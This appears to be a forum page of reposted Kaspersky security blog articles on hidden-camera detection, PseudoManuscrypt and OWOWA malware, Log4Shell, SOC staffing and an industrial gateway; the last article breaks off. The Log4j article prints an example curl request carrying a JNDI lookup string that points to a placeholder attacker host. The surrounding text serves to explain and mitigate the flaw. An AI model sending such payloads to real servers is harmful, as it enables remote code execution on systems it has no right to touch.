Posts posted by KL FC Bot

  1. To the average person, directional microphones, hidden cameras, and other surveillance equipment are the stuff of spy movies. Yet such devices can be found everywhere: from small rented apartments to expensive hotel rooms, from the office to the gym, even in your own home. Today, we explore ways to find them.

    Big Brother’s little siblings

    Miniature cameras are inexpensive (at the time of this writing, prices start at about $4), and they connect to regular Wi-Fi to transfer data — say, to the cloud. That means pretty much anyone can play at being a spy in real life. Why would they?

    In some cases, owners of rental apartments install them in case of theft or damage to property. Suspicious spouses and unscrupulous rivals have other reasons. As do pranksters. Then, there are professional extortionists. Simply put, loads of people have loads of excuses.

    How likely are you to encounter surveillance in everyday, private life? A survey of Airbnb users revealed that 11% of respondents had come across a hidden camera in rented accommodations. And those are just the ones who found something; not every renter carefully inspects the furnishings. What’s more, finding such cameras is not always easy. Lenses may be as small as 2 millimeters in diameter, and the box is usually hidden or camouflaged. How are you supposed to know you’re being spied on?

    Method 1. Hire an expert

    The most reliable way to find hidden spy equipment is to entrust the search to a qualified technician with professional equipment. Today, you can find such experts in almost any city; for example, on Craigslist or another website with classified ads.

    Pros:

    • Efficiency
    • Reliable results
    • Minimal personal effort

    Cons:

    • Price
    • Potential wait time
    • Hotel or apartment restrictions

    Summary

    If you are worried and plan to stay somewhere for a while, or if you’re moving in, hiring an expert may be worth the time and money.

    Method 2. Use dedicated equipment

    You can buy electromagnetic radiation detectors, optical detectors, and other equipment for detecting hidden cameras and use them to check each room yourself. The cheapest ones, with a detection radius of only a few feet, start at $3; professional and more powerful ones are obviously more expensive.

    Incidentally, the simplest optical detector can be assembled manually; all you need are some red LEDs and a red-light filter. Direct the light at the suspected camera site and look through the filter — any camera lens in view will appear as a bright dot. Bear in mind that the range of such a device will not exceed ten meters (about 30 feet).

    If you decide to check for yourself, pay particular attention to the bathroom and bedroom, where compromising footage might be filmed, as well as smoke detectors and household appliances, common hiding spots. Also check paintings, clocks, flower pots, and even toys.

    Pros:

    • Independence
    • Option for regular checks
    • DIY potential

    Cons:

    • Short effective range
    • Price
    • Time and skill requirements

    Summary

    If you’re the only person you trust — and especially if you aren’t afraid of soldering some LEDs — this method is for you.

    Method 3. Use a smartphone

    Sometimes you can do without special equipment and just use your smartphone camera and a flashlight. Turn off the lights and draw the curtains (the room must be dark), turn on both the flashlight and phone camera, and point them where you think a hidden device might be lurking. If your suspicions are correct, you will see a glare on the smartphone screen. If you can’t use the phone’s camera and flashlight simultaneously, use a separate flashlight.

    In some cases, you can even do without a flashlight. Many spy cameras use infrared illumination for filming in the dark. It is invisible to the human eye but not to a smartphone camera. When filming in the dark, the infrared light source will appear on the screen as a pulsing dot. Keep in mind that your smartphone’s main camera may not do the trick, because it probably has an IR-light filter, so the front camera is a better bet. You can experiment with a TV remote to find out if your smartphone is good for the job.

    Pros:

    • Free
    • No special skills required
    • No special equipment required

    Cons:

    • Not all phone models are up to the job
    • Time-consuming
    • Inefficient — false positives are possible, and cameras without infrared illumination won’t show up

    Summary

    This method is suitable only for a superficial inspection; it’s likely to miss something. Still, it’s better than nothing.

    Method 4. Trust an app

    Mobile apps for finding spy cameras and other hidden devices fall into two categories. The first group finds devices by lens glare, as in the method described above. One example is Glint Finder, which detects the glare (or glint) produced when the light of a flashlight hits a lens. Once that happens, you just have to check that spot for a hidden device.

    Apps in the second group are designed to search for wireless spy devices. For them to work, you need to connect to the local Wi-Fi network. After scanning the router, the app displays a list of connected devices. Check any you can’t account for — that is, anything other than gadgets you recognize, such as your own smartphone and laptop. A dedicated tool can help you distinguish harmless equipment from tracking devices by their identifiers.
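
    If you also have a laptop handy, you can get a rough idea of what such apps do under the hood with a couple of standard commands. This is only a sketch: it assumes you’re connected to the same Wi-Fi network, that the network uses a typical 192.168.1.0/24 address range, and that nmap is installed separately.

      # Show devices your machine already knows about on the local network
      arp -a

      # Actively sweep the subnet and list every host that responds
      # (replace 192.168.1.0/24 with your network's actual address range)
      nmap -sn 192.168.1.0/24

    Either way, an unfamiliar device on the list is only a starting point for a closer look, not proof of spying.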

    Pros:

    • Reasonably efficient
    • Minimal costs
    • No equipment required beyond a compatible smartphone

    Cons:

    • Inferior to specialized devices
    • Unsuitable for smart homes with many connected devices
    • Unsuitable for hotel Wi-Fi and other public routers with many connected devices

    Summary
    Specialist software occupies the middle ground between professional equipment and improvised means. It’s probably the best option for cautious travelers, provided they use a trusted app.

    What to do if you detect a spying device

    If you find something that looks like a camera or other tracking device, take a photo of it and do an image search to find out what it might be. It may be harmless.

    But if your fears are confirmed, you should contact the police, hotel administration, or the booking service you used. For example, Airbnb rules explicitly prohibit hidden cameras, so at least some affected guests have gotten refunds or different accommodations.

    Better safe than sorry

    We’ve discussed a few ways to make sure that no extortionist, TikTok prankster, or landlord is filming you without permission. But hidden cameras are not the only danger when traveling. Here are some general tips to help you stay safe in unfamiliar surroundings:

    • Take an external battery to stay connected at all times;
    • Download apps to help your trip go more smoothly, such as maps, dictionaries, and translators;
    • Don’t leave valuables unattended;
    • Never use public computers or terminals for private messaging, logging in to accounts, or online shopping;
    • Use a VPN app to protect your data from hackers, as well as to have access to content that’s not available in the country you are visiting.

    View the full article

  2. In June 2021, our specialists discovered new malware called PseudoManuscrypt. They didn’t go out hunting specifically for it; our standard antivirus engine detected the malicious files, which were similar to known malware.

    Why PseudoManuscrypt is dangerous

    PseudoManuscrypt’s methods are fairly standard for spyware. It starts with a keylogger, grabbing information about established VPN connections and saved passwords. It also regularly steals clipboard contents, records sound using the built-in microphone (if the computer has one), and conducts a general analysis of the compromised system. One variant can also steal the credentials of QQ and WeChat messengers, capture images, and write captured images to video files. Then it sends the data to the attackers’ server. It also includes a tool for disabling security solutions.

    None of the above is weird or surprising. It’s PseudoManuscrypt’s infection mechanism that makes it interesting. For the technical details of the attack and indicators of compromise, see our ICS CERT report.

    Origin of the name

    Our experts found some similarities between the new attack and the already known Manuscrypt campaign, but analysis revealed that a completely different actor, the APT41 group, had previously used part of the malware code in its attacks. We have yet to establish responsibility for the new attack, and for now we’re calling it PseudoManuscrypt.

    Such attribution problems are interesting in their own right; they usually stem from one group of attackers trying to pose as another threat actor. The strategy of planting false flags is nothing new.

    How PseudoManuscrypt infects a system

    Successful infection rests on a rather complex chain of events. The attack on a computer usually begins when the user downloads and executes a pirated key generator for popular software.

    PseudoManuscrypt bait turns up when you search the Internet for a pirated “key generator” to register popular software. Websites that distribute the malicious code rank high in search engine results for such queries — a position the attackers appear to monitor.

    Here you can clearly see why there have been so many attempts to infect industrial systems. In addition to providing keys for popular software (such as office suites, security solutions, navigation systems, and 3D first-person shooters), the attackers also offer fake cracks for professional software, including certain utilities for interacting with PLCs over the Modbus protocol. The result: an abnormally high number of infections in industrial organizations (7.2% of the total).

    Search results for pirated software. PseudoManuscrypt can be found at the very first link.

    The example in the screenshot above features software for system administrators and network engineers. Such an attack vector could provide attackers with immediate, full access to the company’s infrastructure.

    The attackers also use a Malware-as-a-Service delivery mechanism, paying other cybercriminals to distribute PseudoManuscrypt. That practice gave rise to an interesting feature we found when analyzing the malicious files: Some were bundled with other malware that the victim installed as a single package. The purpose of PseudoManuscrypt is to spy, but other malicious programs seek other objectives, such as data encryption and money extortion.

    Who is PseudoManuscrypt targeting?

    The largest number of PseudoManuscrypt detections have occurred in Russia, India, Brazil, Vietnam, and Indonesia. Of the huge number of attempts to run malicious code, users at industrial organizations account for a significant share. Victims in this sector include managers of building automation systems, energy companies, manufacturers, construction companies, and even service providers for water treatment plants. The overwhelming majority of hacking attempts were aimed at developers of certain solutions used in industry.

    Methods for defending against PseudoManuscrypt

    Overall, standard malware detection and blocking tools provide effective protection against PseudoManuscrypt — but only if they are installed on 100% of a company’s systems. In addition, we recommend instituting policies that make disabling protection difficult.

    For IT systems in industry, we also offer a specialized solution, Kaspersky Industrial CyberSecurity, which both protects computers (including specialized ones) and monitors data transfers that use specific protocols.

    Also keep in mind the importance of raising personnel awareness of cybersecurity risks. You can’t totally rule out the possibility of clever phishing attacks, but you can help staff stay alert, and also educate them about the danger of installing unauthorized (and especially pirated) software on computers with access to industrial systems.

    View the full article

  3. The Matrix trilogy (The Matrix, The Matrix Reloaded, The Matrix Revolutions) told of the successful implementation of the metaverse before the idea went mainstream. The creator of this virtual world (or, rather, neural-interactive simulation), we learn, was an artificial intelligence that once defeated and enslaved humanity. The process was not without bugs, which brings us to today’s topic.

    For starters, between the limited data human characters have and the constant misinformation from the AI, viewers never know precisely what’s true, or how realistic their view of the world is at any given moment.

    But we are not interested in philosophical subtext here; our focus is on information security, so we will rely on what are considered the established facts at the end of the third movie. Spoiler alert for anyone who hasn’t watched the whole trilogy but intends to.

    Fighting the Zion Resistance

    At the trilogy’s finale, it becomes clear that the struggle with rebels infiltrating the Matrix is all staged. For the latest cycle of rebellion to succeed, the Matrix needs a certain number of external enemies, so we don’t know for sure whether the agents are really trying to catch Morpheus and his team, or if they’re just simulating a frenzy of activity. From a cybersecurity perspective, it’s not clear whether we’re seeing bugs or features — a design flaw or something deliberately introduced into the Matrix (perhaps as a sort of honeypot).

    Pirate signal from Resistance ships

    The Matrix’s population consists of avatars of enslaved humans who are wired to the system, and of programs that originally existed in the form of code. Why remote broadcasting of signals from outside the system was initially implemented, allowing third-party avatars to be uploaded, remains unclear.

    Such anomalies are usually a result of some sort of debug access that someone forgot to close, but in this case the developers were not human, so that explanation doesn’t fit. Anyway, even if they implemented remote connection on purpose — if it was a feature, not a bug — why didn’t the auto-programmers implement a firewall to block any pirate signals?

    Uncontrolled avatar transmission system

    Inside the Matrix, pirate avatars can appear and disappear only through phone cables (although how mobile and landline phones differ inside a virtual reality framework is not explained). Moreover, Matrix agents are, in principle, able to deactivate the line — at least, they cut it when Morpheus was captured. But if it is so critical for Matrix infiltration and exfiltration, why don’t the agents ban it, or at least disable it throughout the operation zone?

    Incomplete addressing system

    Despite the objective need for such information, the Matrix lacks precise location data for each specific object inside virtual reality. We can assume that pirate avatars are able to hide their location in virtual space, but to stay on the tail of the still-connected Neo in the system, agents needed an additional tracking device. There’s obviously a fault in the addressing system.

    That raises questions about Morpheus’ notorious red pill. In his words, it is a tracking program “designed to disrupt your input/output carrier signals, so we can pinpoint your location.” Why isn’t the Matrix monitoring for such anomalies? Being able to intercept the “rescue team” seems pretty important.

    Artificial constraints on Matrix Agents

    Matrix agents are AIs that can temporarily replace the avatar of any human connected to the system. They can violate the conventional laws of physics, but only up to a point. The twins from the second part of the trilogy are far less impeded by physics, so why can’t such conditional constraints be lifted, at least temporarily, during the operation to capture perpetrators?
    Adding to the mounting errors in their code, for some reason agents have the ability to disconnect from the Matrix information system simply by removing their earpieces, a clear vulnerability if ever there was one.

    Zion mainframe codes

    The whole point of the machines’ hunt for Morpheus in the first movie was to gain the access codes to the Zion mainframe, which every captain knows. That raises a host of questions about why the person with the access codes to the rebels’ critical infrastructure would also be the one who goes into the Matrix.

    That point is especially strange if one recalls that there are people on board without any interface for connecting to the Matrix. Entrusting valuable information to them would obviously be far safer. It’s a misstep by the liberated humans, plain and simple: equivalent in today’s real world to attaching a sticky note with passwords to your monitor and then giving a TV interview with it in the background.

    Rogue software

    For some reason, the Matrix is unable to effectively get rid of programs that are no longer required. Lurking deep inside are various smart apps from old versions of the Matrix: information smugglers, semiphysical militants, a program called Seraph that defines its function as “I protect that which matters most” (a predictable slogan for any information security company).

    According to the Oracle, they should all have been removed, but instead they chose to disconnect from the system and live autonomously inside the virtual reality. The existence of uncontrolled obsolete software is a clear vulnerability, just as it is in real life. They literally help hackers attack the Matrix!

    Software smuggling

    Some programs exist exclusively in the “world of machines” yet can be smuggled into the virtual world of the Matrix, which human avatars can inhabit. The ability to bring in such programs highlights some serious system segmentation issues. In particular, a direct communication channel should not exist between two segments designed to be isolated.

    Backdoor corridor

    Among the exiles is the Keymaker program, which creates keys for backdoors. We don’t know to what extent the Keymaker actually is an exile — perhaps he, like the Oracle, is part of the system to control the rebels through the Chosen One. Not only does the Keymaker cut access keys using a file and a lathe, but it also informs hackers of the existence of a whole corridor of backdoors granting access to different parts of the Matrix, from the Core Network to the Source, the heart of the system. Both the Keymaker and the corridor pose a fundamental security threat to the entire system, especially considering how it’s protected against outsiders.

    The main problem with the corridor’s security is that for some reason it exists according to the notional laws of the virtual world, depending on emulated power plants (that do not actually produce power) and computers at these virtual stations. And these laws in the Matrix, as we know, are notoriously easy to break. Even putting an agent in the corridor would be more effective — so why didn’t they? No money to pay its salary?

    Clones of Agent Smith

    Matrix agents originally had a feature that let them replace the avatar code of any hardwired human. However, agents have always existed as individual copies. At the end of the first movie, Neo, having acquired anomalous abilities, infiltrates Agent Smith and tries to destroy him from the inside, with some part of the code of Neo’s avatar being transferred into the agent’s code. After that, Smith goes haywire and gains the ability to bypass artificial constraints, both the laws of the physical world and the ban on existing in one copy. In other words, he becomes a full-fledged virus.

    By all appearances, Smith is the first virus in the Matrix; otherwise, there is no explanation for why the system has no antivirus solution for tracking software anomalies, isolating and removing dangerous applications that threaten the security of the system. Considering that most of the people freed from the Matrix are hackers, we find that very odd.

    Be that as it may, the existence of Smith, now able to copy his code into any avatar or program, serves as an argument in Neo’s negotiations with the AI. In the end, Neo physically connects to the Matrix, allows Smith to “infect” his avatar, connects to the Smith-net, and destroys all of the Smiths.

    As a result, the machines agree to a truce, to stop exterminating humans, and even to release those who don’t want to live in the Matrix. But they could have just built a secure operating system from the start, or at least used a reliable security solution in combination with an EDR system capable of tracking network anomalies!

    View the full article

  4. This week on the Kaspersky Transatlantic Cable podcast, our good friend Ahmed is a bit under the weather, so we return temporarily to our original podcast lineup.

    We jump right in with the story everyone’s been talking about: Log4j. We start with an overview of what’s going on there, then hop into a second story about botnets leveraging the vulnerability. After that, we discuss a case of fat fingers causing an NFT to be sold for $3,000 — sounds like no big deal, but it was valued at $300,000. Once that cheap sale went through, the item was flipped for a whole lot more money. Talk about an oopsie.

    This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.

    — Marcus Hutchins (@MalwareTechBlog) December 10, 2021

    From there, our discussion shifts to Instagram. Prior to its grilling by the US Congress, the social network announced some changes to the platform. The changes aim to improve users’ experiences and avoid some of the associated harms such as bullying, damage to self-image, and more. Dave and I debate a bit whether it’s just a PR stunt or something that will really benefit society.

    Our fourth story has us diving into a lawsuit Google filed against some hackers. The problem is that it appears largely symbolic.

    For our final story, we head to China, where a man stole more than $20,000 from an ex-girlfriend by unlocking her phone and bank account while she was sleeping — creepy! And to close out the podcast for the year, we offer some tips for anyone who gets new electronics over the holidays.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

     


     

    View the full article

  5. A malicious Internet Information Services (IIS) module is turning Outlook on the web into a tool for stealing credentials and a remote access panel. Unknown actors have used the module, which our researchers call OWOWA, in targeted attacks.

    Why Outlook on the web attracts attackers

    Outlook on the web (previously known as Exchange Web Connect, Outlook Web Access, and Outlook Web App, or simply OWA) is a Web-based interface for accessing Microsoft’s Personal Information Manager service. The app is deployed on Web servers running IIS.

    Many companies use it to provide employees with remote access to corporate mailboxes and calendars without having to install a dedicated client. There are several methods of implementing Outlook on the web, one of which involves using Exchange Server on site, which is what cybercriminals are drawn to. In theory, gaining control of this app gives them access to all corporate correspondence, along with endless opportunities to expand their attack on the infrastructure and launch additional BEC campaigns.

    How OWOWA works

    OWOWA loads on compromised IIS Web servers as a module for all compatible apps, but its purpose is to intercept credentials entered into OWA. The malware checks requests and responses on Outlook on the Web login page, and if it sees a user has entered credentials and received an authentication token in response, it writes the username and password to a file (in encrypted form).

    In addition, OWOWA allows attackers to control its functionality directly through the same authentication form. By entering certain commands into the username and password fields, an attacker can retrieve the harvested information, delete the log file, or execute arbitrary commands on the compromised server through PowerShell.

    For a more detailed technical description of the module with indicators of compromise, see Securelist’s post.

    Who are the victims of OWOWA attacks?

    Our experts detected OWOWA-based attacks on servers in several Asian countries: Malaysia, Mongolia, Indonesia, and the Philippines. However, our experts have reason to believe the cybercriminals are also interested in organizations in Europe.

    The majority of targets were government agencies, with at least one being a transport company (also state-owned).

    How to guard against OWOWA

    You can use the appcmd.exe command — or the regular IIS configuration tool — to detect the malicious OWOWA module (or any other third-party IIS module) on the IIS Web server. Keep in mind, however, that any Internet-facing server, like any computer, needs protection.
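
    To illustrate the appcmd.exe route: a command along the lines of the following, run from an elevated command prompt on the server, lists the modules registered in IIS (the path shown is the default IIS installation location; adjust it if yours differs):

      rem List the native and managed modules registered in IIS;
      rem review the output for third-party entries you did not install.
      %windir%\system32\inetsrv\appcmd.exe list module

    Any module you cannot trace back to Microsoft or to software you deliberately installed deserves a closer look.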

    View the full article

  6. At the tail end of 2017, Eugene Kaspersky made a bold announcement: that we would be launching our Global Transparency Initiative. The program has since given our prospective customers, governments, and partners the unprecedented ability to inspect our source code.

    Trust in cybersecurity being vital, the company knew transparency needed to be more than just words — and that revealing our source code in any way meant we needed extra levels of security. To address the first part, we decided to open up Transparency Centers around the world where the folks listed above could inspect our code in a safe and secure location. In addition to satisfying any concerns they had, they could also help further debunk media myths about backdoors or other nonsense. The first of the centers was in Zurich, Switzerland; others opened elsewhere in Europe as well as Latin America and Asia.

    The latest is in Fredericton, New Brunswick, Canada. As a US citizen, I’m excited about this opening: it’s just a short flight and drive away. To get a good look at any of the other centers would involve flying across the Atlantic! Aside from my general interest in checking out the center, I was pleased to sit down recently with Robert Cataldo, Kaspersky North America’s managing director, to discuss why our newest center is so important to the company’s business.

    Jeff Esposito: Rob, can you tell us a bit about why transparency is important to Kaspersky?

    Robert Cataldo: Transparency should be an important principle for every organization, but especially for those in cybersecurity. Industry, academia, government, and consumers trust us to protect their most precious and confidential information. To maintain and build this trust, we consider it essential to clearly communicate the transparency measures we’re taking and to allow interested stakeholders the opportunity to evaluate all aspects of our business practices and development procedures.

    JE: This is the first Transparency Center on this side of the Atlantic; why is it important for the business — and why Canada?

    RC: Our global vision for the formal transparency initiative established about four years ago included a physical transparency center in North America where interested parties could come and conduct code reviews or even be trained on what to look for during such reviews. We felt it important to deliver on this vision to ensure that we have accessible transparency centers for all the major regions around the world where we operate. We considered many factors when choosing the location for North America, but a big driver for being in New Brunswick became the partnership we could enter into with CyberNB, which now hosts our facility in its brand new Cyber Centre.

    JE: What does this center mean for the business in the Americas?

    RC: The center is a big step toward setting the right example in North America and creating a high standard of openness in our industry.

    JE: What will a verified customer or partner get to experience in the Transparency Center?

    RC: In addition to conducting a full review of our source code, rules, and code base updates, customers and partners can also be trained on the important elements to look for as part of our Cyber Capacity Building Program. Moreover, while there, we can also arrange for product briefings and/or demonstrations for anyone interested.

    JE: What can we expect from our partnership with CyberNB? How does it help further the message of the GTI?

    RC: CyberNB fosters collaboration, sharing, and improved cybermeasures among critical infrastructure, industry, academia, and government and holds a common vision with Kaspersky concerning the importance of transparency in our industry. They have their own transparency center in the Cyber Centre, which creates an opportunity for us to compare notes and help each other improve. CyberNB has also created a member program referred to as CIPNet, short for Critical Infrastructure Protection Network. Kaspersky is a proud member of CIPNet and we’ve already begun exploring synergies with other members to proliferate our transparency principles and further our mission of building a safer world for our partners and customers.

    Cyber Center in Fredericton, New Brunswick

    JE: Talk a bit about the Cyber Centre, the building that our Transparency Center is housed in. I heard you were able to visit and tour the facility. Is that correct?

    RC: The Cyber Centre in Fredericton, New Brunswick is brand-new, and I was fortunate enough to be invited to tour the facility in early December. The center is a modern, world-class building with a well-planned layout for large briefings, small business collaborations, transparency reviews, product certifications, trainings, and all kinds of business events. The center also houses CyberNB’s critical infrastructure SOC, which features large displays of the various forms of threat intelligence — including Kaspersky’s own threat data feeds — and security tools CIPNet members can take advantage of.

    Access to the Transparency Center is available on request. To learn more about Kaspersky’s Global Transparency Initiative, please visit its website.

    View the full article

    Various information security news outlets have reported the discovery of critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). Millions of Java applications use this library to log error messages. To make matters worse, attackers are already actively exploiting this vulnerability. For this reason, the Apache Foundation recommends that all developers update the library to version 2.15.0 or, if that is not possible, use one of the methods described on the Apache Log4j Security Vulnerabilities page.

    Why CVE-2021-44228 is so dangerous

    CVE-2021-44228, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If attackers manage to exploit it on one of the servers, they gain the ability to execute arbitrary code and potentially take full control of the system.

    What makes CVE-2021-44228 especially dangerous is its ease of exploitation: even an inexperienced hacker can successfully attack through it. According to the researchers, attackers need only force the application to write a single string to the log; after that, the message lookup substitution feature lets them load their own code into the application.
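
    As an illustration only (the host names below are placeholders, and the vulnerable endpoint is hypothetical), the attack can be as simple as sending an HTTP request whose header the application later logs:

      # The ${jndi:...} string does nothing on the web server itself; it triggers only
      # when a vulnerable Log4j version formats the logged message, performs the lookup,
      # and fetches attacker-controlled code from the remote server.
      curl -H 'User-Agent: ${jndi:ldap://attacker.example/payload}' https://vulnerable-app.example/

    That is why the malicious string can arrive through any field an application might log: user agents, form inputs, chat messages, and so on.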

    Working Proofs of Concept (PoC) for the attacks via CVE-2021-44228 are already available on the Internet. Therefore, it’s not surprising that cybersecurity companies are already registering massive network scans for vulnerable applications as well as attacks on honeypots.

    This vulnerability was discovered by Chen Zhaojun of Alibaba Cloud Security Team.

    What is Apache Log4j, and why is this library so popular?

    Apache Log4j is part of the Apache Logging Project. By and large, this library is one of the easiest ways to log errors, which is why so many Java developers use it.

    Many large software companies and online services use the Log4j library, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and many more. Because the library is so popular, some information security researchers expect a significant increase in attacks on vulnerable servers over the next few days.

    #Log4Shell pic.twitter.com/1bKDwRQBqt

    — Florian Roth (@cyb3rops) December 10, 2021

    Which versions of Log4j are vulnerable, and how can you protect your server from attacks?

    Almost all versions of Log4j, from 2.0-beta9 through 2.14.1, are vulnerable. The simplest and most effective protection is to install the most recent version of the library, 2.15.0, which you can download from the project page.

    If updating the library is not possible for some reason, the Apache Foundation recommends using one of the mitigation methods. For Log4j versions 2.10 through 2.14.1, set the log4j2.formatMsgNoLookups system property to true, or set the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true. Both options are shown below.
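
    For reference, here is roughly what those two options look like in practice (a sketch; the application name and launch command are placeholders):

      # Option 1: set the system property when launching the JVM (Log4j 2.10-2.14.1)
      java -Dlog4j2.formatMsgNoLookups=true -jar your-app.jar

      # Option 2: set the environment variable before starting the application
      export LOG4J_FORMAT_MSG_NO_LOOKUPS=true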

    To protect earlier releases of Log4j (from 2.0-beta9 to 2.10.0), the library developers recommend removing the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

    In addition, we recommend installing security solutions on your servers — in many cases, that will allow you to detect the launch of malicious code and stop the attack before it develops.

    View the full article

  8. Between the monotony of painstakingly searching for anomalies and the enormous responsibility of ensuring a company’s security, security operations center (SOC) employees endure constant stress. My hope is that sharing my experience as the head of a SOC that provides managed detection and response (MDR) service can help shed some light on SOCs in general, so I’d like to share my five steps to minimize stress and prevent burnout in the SOC.

    Step one: Complete the team

    Organizing your team is key. You need enough people to keep up with the work but not so many that they end up bored. You’re looking for a balance, and finding it is no mystery.

    To begin, define the scope of the work you need and then break down the roles you need to fill: what security services you need in house and what to outsource. Use that breakdown to sketch out your target head count, keeping in mind that you’ll need internal professionals to manage outsourced functions.

    • Start with six people, which is really the minimum a SOC needs to operate. That’s two for monitoring, one for investigation, one to function as architect and engineer, an administrator, and a SOC manager;
    • Think in advance about mitigating the negative impact of turnover to minimize the effects of workload increases on team members.

    Step two: Make work rewarding

    Effective work tends to require motivation. Of course, you need to provide the conditions for growth and comfortable work, but you also need to watch for demotivating factors — so, for example, think about ways to make goals transparent and assessments clear and reasonable. People strive to reach new professional heights, and they excel when they find the work rewarding.

    • Encourage leaders and reward effort rather than silencing newcomers or punishing failure;
    • Ensure good working conditions, including adequate wages and benefits, social programs, time for physical activities, and healthy team relationships;
    • Clarify goals, objectives, and the metrics by which you and the company measure employees’ work;
    • Specify a transparent career path, making sure colleagues understand which team is responsible for what and how to achieve promotions or transfers.

    Step three: Relieve stress

    The job of a SOC analyst is stressful all by itself, making any pressure reduction particularly important. You can’t make the job a cakewalk, but you can take a few simple steps to help ease SOC workers’ loads.

    • Let employees manage their own time. As long as having flexible hours doesn’t affect performance — which you addressed in step two — it shouldn’t cause any trouble;
    • Exchange feedback with your team. Transparency and trust go both ways;
    • Support your team. Workers should feel confident in the face of difficult situations and expect help from management or dedicated experts.

    Step four: Inspire your teammates

    Working in a SOC means being part of a team. Devote some time to analyzing the team, seeking optimal combinations of employees, understanding what tasks each of them performs best, and bolstering team spirit.

    • Give employees varied, nonstandard tasks from time to time. That serves the dual purpose of keeping them interested and helping you learn each team member’s strengths and preferences;
    • Give each team member a sphere of responsibility so they know their contributions are important and valuable;
    • Provide opportunities for professional development, including networking and participation in training courses or webinars;
    • Conduct collaborative team-building activities. As a manager, you may find the different structure of collaboration outside of a work environment reveals qualities that contribute to the team’s productivity.

    Step five: Minimize routine

    Overreliance on routine is a major contributor to burnout. Now, as I said at the start, monotony is part of the job, and you cannot get rid of most routine processes. That said, you can at least minimize the harm with a bit of intelligent outsourcing and task automation.

    • Engage outside specialists in routine activities or tasks where sensible and productive;
    • Implement tools and services to facilitate common IT security practices;
    • Continuously research new areas, and automate everything you can.

    Reallocating resources and tasks is never easy or automatic. Although offloading work sounds appealing, first consider the importance of keeping employees interested and motivated. Some functions may need to stay in-house for legal or other reasons, and for those that can move outside, you’ll need to ensure contracts clarify liability and consequences, not just responsibility. And before automating certain tasks, analyze the relevant work processes, consider user feedback, and identify any problems on the team to develop a realistic and appropriate plan.

    View the full article

  9. After a brief hiatus in old Constantinople, Ahmed and I rejoin David just in time for this week’s Kaspersky Transatlantic Cable podcast, episode 231.

    🌞 Gm it's LAND Sale day!

    Who's ready to Enter Tha SNOOPVERSE!?https://t.co/vGFQoyikDY https://t.co/wp6B0aokiD

    — The Sandbox (@TheSandboxGame) December 2, 2021

    To kick things off, we enter The Sandbox metaverse and get into its land sales — in this case, the opportunity to be Snoop Dogg’s neighbor. Well, sort of. Believe it or not, one of the NFTs sold for a whopping $450,000. And yes, you read that right: someone ponied up the cost of a home — or several, in many US markets — for a plot in the Snoopverse. Virtually living next to the virtual doggfather? What a time to be alive!

    From there, we head back to familiar territory for a look at Facebook’s removal of its self-imposed ban on cryptocurrency ads. Then, after a brief quiz break, it’s a pair of stories about disinformation and what Facebook and Twitter are doing to battle it on their platforms (not enough).

    To close out the podcast, we chat about a new phishing scheme using the Omicron variant of COVID-19 to attract UK victims.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

     


     

    View the full article

    Ten years is a long time in cybersecurity. If we could have looked into the future back then and seen just how far cybersecurity technologies would come by 2022 – I’m sure no one would have believed it. Including me! Paradigms, theories, practices, products (anti-virus – what’s that?) – everything has been transformed and has progressed beyond recognition.

    At the same time, no matter how far we’ve progressed – and despite the hollow promises of artificial intelligence miracles and assorted other quasi-cybersecurity hype – today we’re still faced with the same, classic problems we had 10 years ago:

    How do you protect data from unfriendly eyes and unsanctioned changes while preserving the continuity of business processes?

    Indeed, protecting confidentiality, integrity and accessibility still makes up the daily toil of most cybersecurity professionals.

    No matter where it goes, ‘digital’ always brings with it one and the same problems. It has done, it does, and it will continue to. But of course it will – because the advantages of digitalization are so obvious. Even such seemingly conservative fields as heavy machine building, oil refining, transportation or energy have been heavily digitalized for years already. All well and good, but is it all secure?

    With digital, the effectiveness of business grows in leaps and bounds. But on the other hand, all that is digital can be – and is – hacked, and there are a great many examples of this. There is a great temptation to fully embrace digital – to reap all its benefits; however, it needs to be done in a way that isn’t agonizingly painful (read – with business processes getting interrupted). And this is where our new(ish) special painkiller can help – our KISG 100 (Kaspersky IoT Secure Gateway).

    Kaspersky IoT Secure Gateway 100

    This tiny box (RRP – a little over €1000) is installed between industrial equipment (hereafter – ‘machinery’) and the server that receives various signals from this equipment. The data in these signals varies – on productivity, system failures, resource usage, levels of vibration, measurements of CO2/NOx emissions, and a whole load of others – but it’s all needed to get the overall picture of the production process and to be able to make well-informed, reasoned business decisions.

    As you can see, the box is small, but it sure is powerful too. One crucial functionality is that it only allows ‘permitted’ data to be transferred. It also allows data transmission strictly in just one direction. Thus, in an instant KISG 100 intercepts a whole hodge-podge of attacks: man-in-the-middle, man-in-the-cloud, DDoS attacks, and many more of the internet-based threats that just keep on coming at us in these ‘roaring’ digital times.

    KISG 100 (which works on the Siemens SIMATIC IOT2040 hardware platform and our cyber immune KasperskyOS) divides the external and internal networks in such a way that not a single byte of malicious code can possibly get between the two – so the machinery stays fully protected. The technology (for which we have three patents pending) works based on the data-diode principle: opening the flow of data in only one direction and only upon certain conditions having been met. But, unlike competing solutions, KISG does this (i) more reliably, (ii) simpler, and (iii) cheaper!

    OK, let’s have a closer look…

    It’s not for nothing this little box is called a ‘gateway’, for in principle it works just like the mechanical hydro-technical gateway found on canals – a lock. You open the lower gate, the boat goes into the chamber; the water level rises, the upper gate opens, the boat leaves the chamber. In the same way, KISG 100 first initializes the source agent in the industrial network, then connects it with the data-receiver agent on the server side, and allows the one-way transfer of data.

    Once a connection is made between the machinery and the server, the system has a so-called protected status: access to the external network and to untrusted memory is forbidden to both agents (source and receiver), while access to trusted memory (from which they receive working parameters such as encryption keys, certificates, etc.) is permitted. With this status, the gateway can’t be compromised by attacks from the external network, since at this stage all of its components are disconnected from the outside world and considered trusted; they are merely being loaded and initialized.

    After initialization, the status of the gateway is changed to active: the receiver agent gets the right to both transfer data to an external network and access untrusted memory (in which temporary data is contained). Thus, even if there’s a hack on the server side, the hackers can’t get to the other components of the gateway or the industrial network. Like this:


